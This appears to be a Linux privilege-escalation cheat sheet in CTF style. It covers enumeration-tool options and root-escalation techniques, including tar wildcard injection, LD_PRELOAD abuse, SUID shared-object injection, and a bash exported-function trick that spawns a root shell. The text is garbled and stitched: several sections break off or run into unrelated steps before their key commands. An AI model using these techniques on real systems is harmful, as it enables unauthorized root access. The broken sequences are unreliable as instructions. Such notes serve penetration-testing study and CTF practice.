Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
OPTIONS:
-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-s Supply current user password to check sudo perms (INSECURE)
-r Enter report name
-h Displays this help text
Running with no options = limited scans/no output file
-e Requires the user enters an output location
i.e. /tmp/export. If this location does not exist, it will be created.
-r Requires the user to enter a report name.
The report (.txt file) will be saved to the current working directory.
-t Performs thorough (slow) tests.
Without this switch default 'quick' scans are performed.
-s Use the current user with supplied password to check for sudo permissions -
note this is insecure and only really for CTF use!
-k An optional switch for which the user can search for a single keyword
within many files (documented below).
Linux Smart Enumeration
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
LinPEAS
./linpeas.sh
Tar Wildcard
Condition
A script running by root has a tar command with * at the end
The script folder is writable by the current user
Exploit
Reference:
Example:
TryHackMe: Skynet
If you see a root script running tar command with Wildcard, you may inject command!
For example, root is running a cron job with the following script:
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
As you see, there is a wildcard at the end of the tar command.
The exploit condition is having Write permission on /var/www/html. If so, follow the following step to get a root reverse shell:
Write a bash script (Reverse Shell command) and save as /var/www/html/shell.sh
Run one of the programs you are allowed to run via sudo (listed when running sudo -l) (apache2 as an example here), while setting the LD_PRELOAD environment variable to the full path of the new shared object:
exim-4.84-3 --> Search for exploit in exploit-db (CVE-2016-1531)
SUID / SGID - suid-so Shared Object Injection
Condition
suid-so has root SUID set
Exploit
First run:
/usr/local/bin/suid-so
Then use strace on suid-so and search the output for open/access calls and for no such file errors:
user@debian:~/tools/sudo$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
Find a directory that is writable by the current user. For example:
user@debian:~/tools/suid$ strings /usr/local/bin/suid-env2
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
/usr/sbin/service apache2 start
In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.
user@debian:~/tools/suid$ bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)
Then we can create a Bash function with the name /usr/sbin/service
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service
When running the SUID binary, we will get a root shell:
/usr/local/bin/suid-env2
SUID / SGID - Abuse Shell Features (Bash < 4.4)
Condition
Root SUID binary
Bash < 4.4
Exploit
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.
Run the SUID binary with bash debugging enabled and the PS4 variable set to an embedded command which create an SUID version of bash:
Files created via NFSinherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.
